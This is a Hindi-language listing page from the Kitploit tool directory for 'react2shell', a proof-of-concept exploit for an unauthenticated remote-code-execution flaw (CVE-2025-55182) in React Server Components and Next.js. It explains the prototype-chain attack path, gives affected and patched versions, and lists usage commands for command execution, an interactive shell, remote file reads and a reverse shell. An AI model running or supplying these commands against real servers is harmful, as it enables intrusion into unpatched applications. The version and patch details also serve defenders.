Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell — react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - Unauthenticated RCE in React Server Components (Flight Protocol) - PoC Exploit | Kitploit
उपकरण/GitHubGitHub/rvzsec/react2shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubrvzsec/react2shell

react2shell

react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - Unauthenticated RCE in React Server Components (Flight Protocol) - PoC Exploit

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
react2shell

React2Shell

CVE-2025-55182 (Next.js: CVE-2025-66478)
बिना प्रमाणीकरण के React सर्वर कंपोनेंट्स (फ्लाइट प्रोटोकॉल) में दूरस्थ कोड निष्पादन - PoC एक्सप्लॉइट

विवरण

React सर्वर कंपोनेंट्स (फ्लाइट प्रोटोकॉल) बिना प्रोटोटाइप-चेन एक्सेस की जाँच के multipart/form-data को डिसीरियलाइज़ करते हैं। एक एकल बिना प्रमाणीकृत POST जिसमें Next-Action हेडर है, एक निर्मित रेफरेंस चेन ($1:__proto__:then + $1:constructor:constructor) के माध्यम से Function कंस्ट्रक्टर तक पहुँचता है, जिसके परिणामस्वरूप सर्वर पर दूरस्थ कोड निष्पादन होता है।

react-server-dom-{webpack,turbopack,parcel} 19.0.0 - 19.2.0 और डाउनस्ट्रीम उपभोक्ताओं (जिसमें Next.js ऐप राउटर (14.3.0-canary.77+, 15.x, 16.x) शामिल है) को प्रभावित करता है। डिफ़ॉल्ट create-next-app प्रोजेक्ट असुरक्षित हैं।

उपयोग

root@kitploit:~
git clone https://github.com/rvzsec/react2shell
cd react2shell
pip3 install -r requirements.txt
root@kitploit:~
python3 react2shell.py check    -t <target>
python3 react2shell.py exec     -t <target> -c '<command>'
python3 react2shell.py shell    -t <target>
python3 react2shell.py file     -t <target> -f <remote-path> -o <local-out>
python3 react2shell.py revshell -t <target> --lhost <ip> --lport <port>

पैच किए गए संस्करण

React 19.0.1 / 19.1.2 / 19.2.1+ - Next.js 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7

श्रेय

मूल खुलासा: Lachlan Davidson (@lachlan2k)

टूल डाउनलोड करें